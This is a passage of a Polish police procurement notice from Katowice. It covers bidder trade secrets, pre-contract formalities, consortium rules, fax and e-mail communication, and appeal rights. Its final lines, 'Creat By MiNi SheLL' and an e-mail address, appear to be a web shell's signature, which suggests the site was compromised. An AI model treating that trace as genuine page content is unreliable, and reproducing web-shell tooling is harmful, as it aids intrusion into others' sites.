nie później niż w terminie składania wniosku zastrzegł, że nie mogą byćone udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. 10. JeżeliWykonawca będzie dołączał do wniosku o dopuszczenie do udziału w postępowaniu dokumentyzawierające tajemnice przedsiębiorstwa winien to zrobić dodatkowej zabezpieczonej kopercie, z opisemINFORMACJE STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA oraz załączyć dokumentywskazujące, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca zastosujepowyższą procedurę także w przypadku składania informacji stanowiące tajemnicę przedsiębiorstwa poterminie składania wniosków. 11. Podmiot prowadzący działalność gospodarczą jako osoba fizyczna,osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, może złożyć tylko jedenwniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner Konsorcjum firm. 12. Wprzypadku złożenia przez jednego Wykonawcę dwóch lub więcej wniosków o dopuszczenie do udziału wpostępowaniu Zamawiający uzna złożenie wniosku za ważne i dopuści Wykonawcę do udziału wpostępowaniu na podstawie wszystkich złożonych wniosków. IV INFORMACJA OFORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO PRZEPROWADZENIULICYTACJI W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO. 1. Przedzawarciem umowy Wykonawca dostarcza Zamawiającemu wypełniony formularz ofertowy - załącznik nr6 do ogłoszenia, kwota wskazana w formularzu ofertowym może być niższa od kwoty wylicytowanej w celu umożliwienia wypełnienia formularza ofertowego 2. Błędne wypełnienie formularza ofertowego, będzie skutkowało wezwaniemWykonawcy do przedłożenia prawidłowego formularza ofertowego, a w przypadku odmowy jegopoprawienia Zamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy w sprawie zamówieniapublicznego i będzie miał zastosowanie art. 94 ust. 3 ustawy Prawo Zamówień Publicznych. 3. Umowazawarta z Wykonawcą będzie realizowana w oparciu o cenę wskazaną w formularz ofertowym. 4. Wprzypadku zwycięstwa w licytacji Wykonawcy będącego spółką z ograniczoną odpowiedzialnością, którejwartość oferty przewyższa dwukrotnie wysokość kapitału zakładowego Wykonawca zobowiązany jestnajpóźniej w dniu podpisania umowy do przedłożenia uchwały wspólników lub odpisu umowy spółkiwyrażającej zgodę na zaciągnięcie takiego zobowiązania (art. 230 Kodeksu Spółek Handlowych).Powyższe dotyczy również Wykonawców ubiegających się wspólnie o udzielenie zamówieniapublicznego. 5. W przypadku zwycięstwa w licytacji przez Wykonawców ubiegających się wspólnie oudzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowykonsorcjum, która będzie regulować wzajemną współpracę Wykonawców, czyli zawierać postanowieniadotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania rozliczeń. Zgodnie ztreścią art. 141 ustawy PZP Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponosząsolidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej odpowiedzialności zostałyuregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca współpracę podmiotów występującychwspólnie (konsorcjum) ma m.in.: upoważniać jednego z członków konsorcjum - Lidera - jako osobę prawną i reprezentującą go wskazaną osobę fizyczną, do występowania w imieniu każdego z pozostałychPartnerów we wszystkich sprawach związanych z umową; stwierdzać, że Partnerzy będą odpowiedzialnisolidarnie za całość podjętych zobowiązań w ramach realizacji zamówienia; być zawarta na czas trwaniaumowy, aż do ostatecznego wygaśnięcia obowiązków i praw wobec Zamawiającego; być zawarta wformie pisemnej. 6. W przypadku powierzenia części zamówienia podwykonawcy zgodnie zoświadczeniem złożonym na wniosku o dopuszczenie do udziału w postępowaniu. 7. Szczegółowewymogi dot. podwykonawstwa w trakcie realizacji zamówienia zostały uregulowane we projekcieumowy, której wzór stanowi załącznik nr 2 i 2a do ogłoszenia. 8. Wykonawca jest zobligowany przedzawarciem umowy do przekazania informacji dotyczącej imion i nazwisk oraz nr uprawnień osób, którebędą pełniły funkcje wskazane we wzorze umowy. V INFORMACJE O SPOSOBIEPOROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI WRAZ ZE WSKAZANIEMPRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ ZWYKONAWCAMI: 1. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający iWykonawcy przekazują pisemnie do momentu otwarcia licytacji. 2. Oświadczenia, pisma, wnioski (zawyjątkiem wniosku o dopuszczenie do udziału w postępowaniu), zawiadomienia oraz informacjeprzekazane za pomocą faksu lub drogą elektroniczną uważa się za złożone przez Wykonawcę w terminie,jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona na piśmiedoręczone osobiście lub pocztą pod adres: Komenda Wojewódzka Policji w Katowicach ZespółZamówień Publicznych 40-038 Katowice ul. J. Lompy 19. UWAGA: Zamawiający nie uzna za skuteczneprzekazanie w wyznaczonym terminie wniosku o dopuszczenie do udziału w postępowaniu przekazanegodrogą elektroniczną lub za pomocą faksu, uzupełnienia wniosku o dopuszczenie do udziału wpostępowaniu o brakujące dokumenty w przypadku przekazania tych dokumentów wyłącznie drogąelektroniczną lub za pomocą faksu. Uzupełniane dokumenty muszą zostać przekazane w formiepapierowej (oryginał lub kserokopia poświadczona za zgodność z oryginałem zgodnie ze wskazaniem nawezwaniu do uzupełnienia). 3. Zamawiający przekazuje wszelkie pisma za pomocą faksu lub pocztąelektroniczną zgodnie z pkt 4 oraz niezwłocznie potwierdza pocztą. Terminy wyznaczone przezZamawiającego na dokonanie poszczególnych czynności przez Wykonawcę liczone są od dniaprzekazania pisma za pomocą faksu lub pocztą elektroniczną zgodnie z pkt. 4. 4. Wykonawcyzobowiązani są do wskazania we wniosku o dopuszczenie do udziału w postępowaniu, załącznik nr 1 doogłoszenia numeru telefonu oraz numeru faksu lub adresu poczty elektronicznej, na który Zamawiającybędzie przesyłał Wykonawcy wszelkie pisma przekazywane w ramach postępowania. Wykonawcawybiera faks albo pocztę elektroniczną według własnego uznania. W przypadku wpisania przezWykonawcę zarówno numeru faksu jak i adresu poczty elektronicznej Zamawiający będzie przesyłałzeskanowane dokumenty pocztą elektroniczną. 5. Wykonawca ponosi pełną odpowiedzialność za odbieranie przesyłanej poczty elektronicznej. W przypadku zaniechania odebrania przesłanej pocztyWykonawca ponosi wszelkie wynikające z tego skutki. Zamawiający nie wymaga potwierdzeniaotrzymania przesyłanego pisma drogą elektroniczną. 6. W przypadku wyboru przez Wykonawcę jakodrogi otrzymywania pism nadawanych przez Zamawiającego za pomocą faksu Wykonawca ponosiodpowiedzialność za sprawdzenie kompletności i czytelności otrzymania przesłanego pisma. Brakkompletności lub czytelności Wykonawca niezwłocznie zgłasza Zamawiającemu telefonicznie na nr 32200 20 50. Za dowód skutecznego przesłania pisma do Wykonawcy za pomocą faksu Zamawiającyuznaje potwierdzenie przesłania faksowego OK na numer podany przez Wykonawcę na wniosku odopuszczenie do udziału w postępowaniu i wykazany na potwierdzeniu faksowym. Zamawiający niewymaga potwierdzenia otrzymania przekazywanego pisma za pomocą faksu. 7. Wykonawcazobowiązany jest do powiadomienia Zamawiającego w przypadku zmiany numeru telefonu, faksu lubadresu poczty elektronicznej, pod który Zamawiający ma przesyłać pisma. W przypadku nie dokonaniapowiadomienia Zamawiającego, przesłanie pisma na numer faksu lub pod adres poczty elektronicznejwskazany na wniosku o dopuszczenie do udziału w postępowaniu zgodnie z zasadami wskazanymipowyżej uważa się za skutecznie dokonane. 8. Zaproszenia do udziału w licytacji zostaną przekazaneWykonawcom zgodnie z wybraną drogą porozumiewania się (faksem lub pocztą elektroniczną) ipotwierdzone pocztą. 9. Przesyłanie wszelkich oświadczeń, pism, wniosków, zawiadomień orazinformacji za pomocą faksu lub drogą elektroniczną do Komendy Wojewódzkiej Policji w KatowicachZespół Zamówień Publicznych może odbywać się tylko w dniach roboczych (od poniedziałku do piątku)w godzinach 7.30-15.30 na numer faksu 32 200 20 60 lub na adres email: zamowienia@ka.policja.gov.plUwaga: W przypadku przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany uZamawiającego w pierwszym następującym dniu roboczym z wpływem wynikającym z daty i godzinyfaktycznego otrzymania korespondencji 10. Od momentu otwarcia do momentu zamknięcia licytacjiZamawiający i Wykonawcy wszelkiego rodzaju wnioski, oświadczenia i inne informacje przekazujądrogą elektroniczną za pośrednictwem platformy licytacyjnej; wiadomości przekazywane Wykonawcombędą widoczne w zakładce moje wiadomości. 11. Wyjaśnienia nie będą udzielane telefonicznie. VIPOUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY WTOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA. 1.Wykonawcy w toku postępowania oudzielenie zamówienia przysługują środki ochrony prawnej określone w dziale VI ustawy Prawozamówień publicznych. 2.Wykonawcy, a także innemu podmiotowi jeżeli ma lub miał interes wuzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przezZamawiającego przepisów ustawy Pzp przysługuje odwołanie wobec czynności: - określenia warunkówudziału w postępowaniu - wykluczenia odwołującego z postępowania o udzielenie zamówienia -odrzucenia oferty odwołującego - opisu przedmiotu zamówienia - wyboru najkorzystniejszej oferty 3.Odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności zamawiającegostanowiącej podstawę jego wniesienia --jeżeli zostały przesłane drogą elektroniczną lub faksową albo wterminie 10 dni -- jeżeli zostały przesłane w inny sposób. 4.Odwołanie wobec treści ogłoszenia ozamówieniu, a jeżeli postępowanie jest prowadzone w trybie przetargu nieograniczonego, także wobecpostanowień specyfikacji istotnych warunków zamówienia, wnosi się w terminie: 5 dni od dniazamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunkówzamówienia na stronie internetowej. 5.Odwołanie wobec czynności innych niż określone w ust. 2 i 3wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności możnabyło powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia. 6.Odwołanie wnosisię do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo elektronicznej opatrzonejbezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanegocertyfikatu lub równoważnego środka, spełniającego wymagania dla tego rodzaju podpisu.. 7.Odwołującyprzesyła kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w takisposób aby mógł on zapoznać się z jego treścią przed upływem tego terminu. 8.Zamawiający przesyłaniezwłocznie, nie później niż w terminie 2 dni od dnia otrzymania, kopie odwołania innym Wykonawcomuczestniczącym w postępowaniu o udzielenie zamówienia publicznego, a jeżeli odwołanie dotyczy treściogłoszenia, zamieszcza ją również na stronie internetowej Zamawiającego,wzywając Wykonawców do przystąpienia do postępowania odwoławczego. 9.W przypadku wniesieniaodwołania po upływie terminu składania ofert bieg terminu związania ofertą ulega zawieszeniu do czasuogłoszenia przez Izbę orzeczenia. 10.Na czynności na które nie przysługuje odwołanie na podstawie art.180 ust. 2 ustawy Pzp, Wykonawca może w terminie przewidzianym na wniesienie odwołaniapoinformować Zamawiającego o niezgodnej z przepisami ustawy czynności podjętej przezZamawiającego lub zaniechaniu czynności do której jest on zobowiązany.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com